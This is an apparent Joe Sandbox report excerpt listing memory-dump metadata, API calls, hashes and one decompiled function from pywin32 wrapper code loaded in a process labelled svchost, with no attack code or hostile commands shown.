                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Err_Format$freemalloc
                            • String ID: )$Don't supply a param for SPI_GETNONCLIENTMETRICS$SystemParametersInfo$Unable to allocate %d bytes
                            • API String ID: 475777474-1221699255
                            • Opcode ID: d3faa3b696f8a4eebe0204c606408ff6dae3761d61b59eabd0e06e7f589cf1d6
                            • Instruction ID: c5b243124af858cd8f017501ea11dbdc8725323698c02547f95f17ea033fe0dc
                            • Opcode Fuzzy Hash: d3faa3b696f8a4eebe0204c606408ff6dae3761d61b59eabd0e06e7f589cf1d6
                            • Instruction Fuzzy Hash: A821947850C3029FEB018F18DC84A6A7BB5FB86305F088769F551C7221D731D9AADB53
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiiO:CreateEvent,?,?,?,?), ref: 6DA91458
                            • ?PyWinObject_AsSECURITY_ATTRIBUTES@@YAHPAU_object@@PAPAU_SECURITY_ATTRIBUTES@@H@Z.PYWINTYPES38(?,?,00000001), ref: 6DA91476
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,00000001,00000001,00000000), ref: 6DA91490
                            • PyEval_SaveThread.PYTHON38 ref: 6DA9149F
                            • CreateEventW.KERNEL32(?,?,?,?), ref: 6DA914B7
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DA914C0
                            • ?PyWinObject_FromHANDLE@@YAPAU_object@@PAX@Z.PYWINTYPES38(00000000), ref: 6DA914D3
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DA914DF
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Object_$U_object@@$Eval_Thread$Arg_CreateEventFreeFromParseRestoreSaveTuple
                            • String ID: CreateEvent$OiiO:CreateEvent
                            • API String ID: 2153353669-721273015
                            • Opcode ID: 0572ff3d6adfa6c0be362ad268e111e05b95b60f5d375cda3e5ae7f8af1f48e7
                            • Instruction ID: 8eb5c1aba9220015075e3ff6d9c367751c68234d8239f24ae03c41cf18b3b264
                            • Opcode Fuzzy Hash: 0572ff3d6adfa6c0be362ad268e111e05b95b60f5d375cda3e5ae7f8af1f48e7
                            • Instruction Fuzzy Hash: 4421E575018301ABDB009F58CC08BAB7BF8FF89359F448429F864C52A1EB71C0668B96
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OllO:CreateSemaphore,?,?,?,?), ref: 6DA91638
                            • ?PyWinObject_AsSECURITY_ATTRIBUTES@@YAHPAU_object@@PAPAU_SECURITY_ATTRIBUTES@@H@Z.PYWINTYPES38(?,?,00000001), ref: 6DA91656
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,00000001,00000001,00000000), ref: 6DA91670
                            • PyEval_SaveThread.PYTHON38 ref: 6DA9167F
                            • CreateSemaphoreW.KERNEL32(?,?,?,?), ref: 6DA91697
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DA916A0
                            • ?PyWinObject_FromHANDLE@@YAPAU_object@@PAX@Z.PYWINTYPES38(00000000), ref: 6DA916B3
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DA916BF
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Object_$U_object@@$Eval_Thread$Arg_CreateFreeFromParseRestoreSaveSemaphoreTuple
                            • String ID: CreateSemaphore$OllO:CreateSemaphore
                            • API String ID: 677282856-2215705474
                            • Opcode ID: f8d3b60242c28269b98da339f8f203adb87612df07e389fdb202f1809ecff45e
                            • Instruction ID: 5b72caf5fa652b6ae95e486ef4da5ddce6bdbc47ca9d1e020ac5472b8623c9e9
                            • Opcode Fuzzy Hash: f8d3b60242c28269b98da339f8f203adb87612df07e389fdb202f1809ecff45e
                            • Instruction Fuzzy Hash: 5121F435518301AFDB009F18CC08BAB7FF8FF89355F448829F964C51A1EB71C0698B9A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOO|O,?,?,?,6E294CE8), ref: 6DAA68A7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA68BD
                            • PyCallable_Check.PYTHON38(?), ref: 6DAA68CE
                            • PyErr_SetString.PYTHON38(6E28ED8C,The 3rd argument must be callable), ref: 6DAA68E7
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000001,00000000), ref: 6DAA6903
                            • Py_BuildValue.PYTHON38(6DAC2720,?,?), ref: 6DAA691F
                            • EnumFontFamiliesW.GDI32(?,?,Function_00006780,00000000), ref: 6DAA6938
                            • _Py_Dealloc.PYTHON38(-000000FF), ref: 6DAA694A
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DAA6957
                            • PyLong_FromLong.PYTHON38(00000000), ref: 6DAA695E
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_$U_object@@$Arg_BuildCallable_CheckDeallocEnumErr_FamiliesFontFreeFromLongLong_ParseStringTupleValue
                            • String ID: OOO|O$The 3rd argument must be callable
                            • API String ID: 3822935182-2869722672
                            • Opcode ID: 41f43b4133e59ce380f03cbbb615f1ab0d749e739c909088d6ceba7a42824665
                            • Instruction ID: 6ca00d189cfc3094867b63e81c8fcf6b5acd55fd91eb4566e7fbf8d5d91554a9
                            • Opcode Fuzzy Hash: 41f43b4133e59ce380f03cbbb615f1ab0d749e739c909088d6ceba7a42824665
                            • Instruction Fuzzy Hash: DF21923140C302AFDB019F18CC45A6B7BB8FF45215F484629F995C1271E731D9AACBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiO:CreateWaitableTimer,?,?,?), ref: 6DA91723
                            • ?PyWinObject_AsSECURITY_ATTRIBUTES@@YAHPAU_object@@PAPAU_SECURITY_ATTRIBUTES@@H@Z.PYWINTYPES38(?,?,00000001), ref: 6DA91741
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,00000001,00000001,00000000), ref: 6DA9175B
                            • PyEval_SaveThread.PYTHON38 ref: 6DA9176A
                            • CreateWaitableTimerW.KERNEL32(?,?,?), ref: 6DA9177E
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DA91787
                            • ?PyWinObject_FromHANDLE@@YAPAU_object@@PAX@Z.PYWINTYPES38(00000000), ref: 6DA9179A
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DA917A6
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Object_$U_object@@$Eval_Thread$Arg_CreateFreeFromParseRestoreSaveTimerTupleWaitable
                            • String ID: CreateWaitableTimer$OiO:CreateWaitableTimer
                            • API String ID: 23462941-3919842845
                            • Opcode ID: 52c63c0b60a3743ff9d38f330805ecebc3b01a1acfff0b9265ea792c4a7cd1b6
                            • Instruction ID: 973fa274227d9bf50e6379ae9b6f0f8b27e45b2ff46849a43b0bbf20598a7360
                            • Opcode Fuzzy Hash: 52c63c0b60a3743ff9d38f330805ecebc3b01a1acfff0b9265ea792c4a7cd1b6
                            • Instruction Fuzzy Hash: 7D212535028301AFDB005B58DC48BAF7BF8FF99314F508425F864D51A0EB75C06A8B5A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOO:EnumPropsEx,?,?,?), ref: 6DAAD4AB
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAD4C1
                            • PyCallable_Check.PYTHON38 ref: 6DAAD4D1
                            • PyErr_SetString.PYTHON38(6E28ED8C,EnumFunc must be callable), ref: 6DAAD4EA
                            • PyEval_SaveThread.PYTHON38 ref: 6DAAD50A
                            • EnumPropsExW.USER32(?,Function_0000D3A0,?), ref: 6DAAD520
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAAD529
                            • PyErr_Occurred.PYTHON38 ref: 6DAAD538
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(EnumPropsEx,00000000), ref: 6DAAD548
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Err_Eval_ThreadU_object@@$Arg_Callable_CheckEnumError@@Object_OccurredParsePropsRestoreSaveStringTupleWin_
                            • String ID: EnumFunc must be callable$EnumPropsEx$OOO:EnumPropsEx
                            • API String ID: 2351894313-3429847841
                            • Opcode ID: ed46a6bc555f3ecbf8d8cca775f6447b02c32daa306b113381fa0e272324d787
                            • Instruction ID: 51032eef8eb96be7c8b245db3f37b0836b991a3d66e0a8d3e02db8e2bd21c467
                            • Opcode Fuzzy Hash: ed46a6bc555f3ecbf8d8cca775f6447b02c32daa306b113381fa0e272324d787
                            • Instruction Fuzzy Hash: E1213E7590C306AFDB00AF69CC48A5A77F8BF85601F488625FD85C2132F731D966CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO:SetParent,?), ref: 6DAB7525
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB7546
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB7558
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: OO:SetParent$SetParent
                            • API String ID: 1248562531-3771438241
                            • Opcode ID: 362fbf9bb2d603b02e1a3793b5d42133ff77647de2babcf3c3c2b798972c5e6c
                            • Instruction ID: 58aa387a4db933f8340292b3399bae67bcad33d795c6998f15d9797ac73fe632
                            • Opcode Fuzzy Hash: 362fbf9bb2d603b02e1a3793b5d42133ff77647de2babcf3c3c2b798972c5e6c
                            • Instruction Fuzzy Hash: C71172758083126FEB00AF28CC45BBB36BCEF80205F488A69F855C1121F77195579AA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO:ChildWindowFromPoint,?), ref: 6DAB8195
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB81B1
                            • ?PyWinObject_AsPOINT@@YAHPAU_object@@PAUtagPOINT@@@Z.PYWINTYPES38(?,?), ref: 6DAB81C7
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB81D6
                            • SetLastError.KERNEL32(00000000), ref: 6DAB81E0
                            • ChildWindowFromPoint.USER32 ref: 6DAB81F2
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB81FB
                            • GetLastError.KERNEL32 ref: 6DAB8208
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(ChildWindowFromPoint,00000000), ref: 6DAB8218
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$ErrorEval_LastObject_Thread$Arg_ChildError@@FromParsePointRestoreSaveT@@@TupleUtagWin_Window
                            • String ID: ChildWindowFromPoint$OO:ChildWindowFromPoint
                            • API String ID: 1464544560-2091561692
                            • Opcode ID: 999f4b13a80c41bc7c526b3da3a0a9a15908b3ae8a773a50f49e1908d0b14f27
                            • Instruction ID: cc6c47aeadfdb72584f4158f2c348f32df97d969d3a70fc57ea978f62c60725a
                            • Opcode Fuzzy Hash: 999f4b13a80c41bc7c526b3da3a0a9a15908b3ae8a773a50f49e1908d0b14f27
                            • Instruction Fuzzy Hash: 6911517540C202AFDB006F68DC49B6B3BB9EF85341F488538F959C1131E735C96B9AA7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiiiiOiiiiO:StretchBlt,?,?,?,?,?,?,?,?,?,?), ref: 6DAAEE4A
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAEE6B
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAEE7D
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DAAEE8A
                            • PyErr_Occurred.PYTHON38 ref: 6DAAEE9A
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_Err_LongLong_MaskOccurredParseTupleUnsigned
                            • String ID: OiiiiOiiiiO:StretchBlt$StretchBlt
                            • API String ID: 3610075487-1755100787
                            • Opcode ID: 1c0379210ccc11abeb0d2b38336187872fea625caeb5d37c99ef39ce223774c2
                            • Instruction ID: dd04915ca51470fdb36db5fc158211cfb749aa5af493d58f9ed81d383b23ad3b
                            • Opcode Fuzzy Hash: 1c0379210ccc11abeb0d2b38336187872fea625caeb5d37c99ef39ce223774c2
                            • Instruction Fuzzy Hash: 3B31307240C345AFCB019F54CC44EABBBF9BF89250F484A29F995C2120E731DA599B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyErr_Format.PYTHON38(6E2925BC,%s is not available on this platform,TransparentBlt), ref: 6DAA81AD
                            • PyArg_ParseTuple.PYTHON38(?,OiiiiOiiiiI:TransparentBlt,?,?,?,?,?,?,?,?,?,?,?), ref: 6DAA81FA
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_FormatParseTuple
                            • String ID: %s is not available on this platform$OiiiiOiiiiI:TransparentBlt$TransparentBlt$TransparentBlt
                            • API String ID: 361908667-111053931
                            • Opcode ID: 5c5e810fbbc9c100c185f04d21e9bb7a359dab7a099caaba205f72efddae0f9c
                            • Instruction ID: c38cc349536c56844544d32cff6a1784722f84544204af2bdc65942a7f90680d
                            • Opcode Fuzzy Hash: 5c5e810fbbc9c100c185f04d21e9bb7a359dab7a099caaba205f72efddae0f9c
                            • Instruction Fuzzy Hash: A231527240C345AFCB019B54CC80DEB7BFDBF89344F484A29F99582130E732D56A9B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiiiiOiiO:BitBlt,?,?,?,?,?,?,?,?), ref: 6DAAED20
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAED41
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAED53
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DAAED60
                            • PyErr_Occurred.PYTHON38 ref: 6DAAED70
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_Err_LongLong_MaskOccurredParseTupleUnsigned
                            • String ID: BitBlt$OiiiiOiiO:BitBlt
                            • API String ID: 3610075487-2522464790
                            • Opcode ID: a57d6f7c78a82f4fcdd89b1983cd1b4a3bd506868e376a822d94ffeccda1fb39
                            • Instruction ID: 6730a87d42f5a22df9a356a439f6c1d2bc77ef29c4d4cd5140c23b39617c1bc2
                            • Opcode Fuzzy Hash: a57d6f7c78a82f4fcdd89b1983cd1b4a3bd506868e376a822d94ffeccda1fb39
                            • Instruction Fuzzy Hash: B1315272508305AFDB01DF64CC80FABBBF8BF89350F484A29F985C2120E771D6599B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Ol:ReleaseSemaphore,?,?), ref: 6DA91E2D
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DA91E49
                            • ReleaseSemaphore.KERNEL32(?,?,?), ref: 6DA91E63
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(ReleaseSemaphore,00000000), ref: 6DA91E73
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@Object_ParseReleaseSemaphoreTupleWin_
                            • String ID: Ol:ReleaseSemaphore$ReleaseSemaphore
                            • API String ID: 809431317-858305659
                            • Opcode ID: ffa3d1c64c2a32a79cc5894b19feed0442926fb8102fd139b2a9aeedef4fdbf8
                            • Instruction ID: 66ed70c63fcd5970256965329a278218091e63c6d2a652c860e87c557b63bc83
                            • Opcode Fuzzy Hash: ffa3d1c64c2a32a79cc5894b19feed0442926fb8102fd139b2a9aeedef4fdbf8
                            • Instruction Fuzzy Hash: 8021367952C2016FDB005B28CC85B7B3BFCFF99215F484424F828CA251FB35C9669A6A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiOO:PostThreadMessage,?,?,?), ref: 6DAAD987
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DAAD99D
                            • PyErr_Occurred.PYTHON38 ref: 6DAAD9AD
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_LongLong_MaskOccurredParseTupleUnsigned
                            • String ID: OiOO:PostThreadMessage$PostThreadMessage
                            • API String ID: 3166690688-202928148
                            • Opcode ID: 0b2c43a83292d8c76b999f42b96dc0474a3516134b82fb0c84639f6db4c26bd0
                            • Instruction ID: 1c1f9b066ee31e32024dbc342a46dd9234a967da9ac9563940a3d57e7754632e
                            • Opcode Fuzzy Hash: 0b2c43a83292d8c76b999f42b96dc0474a3516134b82fb0c84639f6db4c26bd0
                            • Instruction Fuzzy Hash: F521A67540C305AFDB00AF28DC81BAA77F8FF84261F484A29FC8482121E735D95A9A93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 37%
                            			E6DAA8C20(intOrPtr _a8) {
                            				char _v4;
                            				struct HWND__* _v8;
                            				int _v12;
                            				void _v16;
                            				char* _t15;
                            				struct HWND__** _t16;
                            				void _t18;
                            				long _t21;
                            				void* _t26;
                            				struct HWND__** _t27;
                            				void* _t31;
                            				void* _t32;
                            				void* _t35;
                            				long _t37;
                            
                            				_v16 = 0;
                            				_t15 =  &_v4;
                            				__imp__PyArg_ParseTuple(_a8, "Oi|i", _t15,  &_v12,  &_v16);
                            				if(_t15 != 0) {
                            					_t16 =  &_v8;
                            					__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v4, _t16);
                            					if(_t16 == 0) {
                            						goto L1;
                            					} else {
                            						__imp__PyEval_SaveThread(_t31, _t35, _t26);
                            						_t27 = _t16;
                            						_t18 = _v16;
                            						if(_t18 == 0) {
                            							_t18 = SendMessageW(_v8, 0xc1, _v12, 0) + 1;
                            							_v16 = _t18;
                            						}
                            						_t32 = malloc(_t18 + _t18);
                            						 *_t32 = _v16;
                            						_t21 = SendMessageW(_v8, 0xc4, _v12, _t32);
                            						_t37 = _t21;
                            						__imp__PyEval_RestoreThread(_t27);
                            						if(_t37 != 0) {
                            							__imp__?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_WH@Z(_t32, _t37);
                            							free(_t32);
                            							return _t21;
                            						} else {
                            							 *__imp___Py_NoneStruct =  *__imp___Py_NoneStruct + 1;
                            							free(_t32);
                            							return __imp___Py_NoneStruct;
                            						}
                            					}
                            				} else {
                            					L1:
                            					return 0;
                            				}
                            			}

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oi|i,?,?), ref: 6DAA8C41
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA8C5D
                            • PyEval_SaveThread.PYTHON38 ref: 6DAA8C6D
                            • SendMessageW.USER32(?,000000C1,?,00000000), ref: 6DAA8C92
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6DAA8C9C
                            • SendMessageW.USER32(?,000000C4,?,00000000), ref: 6DAA8CBB
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAA8CC0
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6DAA8CDB
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_MessageSendThread$Arg_Object_ParseRestoreSaveTupleU_object@@freemalloc
                            • String ID: Oi|i
                            • API String ID: 3299793873-315721950
                            • Opcode ID: 3a515adfe627fb60f590d1a72913fc40abedc2dcdf72adb2694c5fdebcdb384a
                            • Instruction ID: 714c6b0ec36525474c2304a8c58390925514dfdd2392a8ed7e6e10ca12cc20dd
                            • Opcode Fuzzy Hash: 3a515adfe627fb60f590d1a72913fc40abedc2dcdf72adb2694c5fdebcdb384a
                            • Instruction Fuzzy Hash: 7F21B575508301AFDB009F28CC85BAB7BB8FF85655F444629FD45D3221E33998268BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiiO:InsertMenuItem,?,?,?), ref: 6DAB2E0F
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB2E2B
                            • PyObject_AsReadBuffer.PYTHON38(?,?,?), ref: 6DAB2E46
                            • PyErr_Format.PYTHON38(6E28ED8C,Argument must be a %d-byte string/buffer (got %d bytes),00000030,?), ref: 6DAB2E6B
                            Strings
                            • InsertMenuItem, xrefs: 6DAB2EAC
                            • OiiO:InsertMenuItem, xrefs: 6DAB2E06
                            • Argument must be a %d-byte string/buffer (got %d bytes), xrefs: 6DAB2E64
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
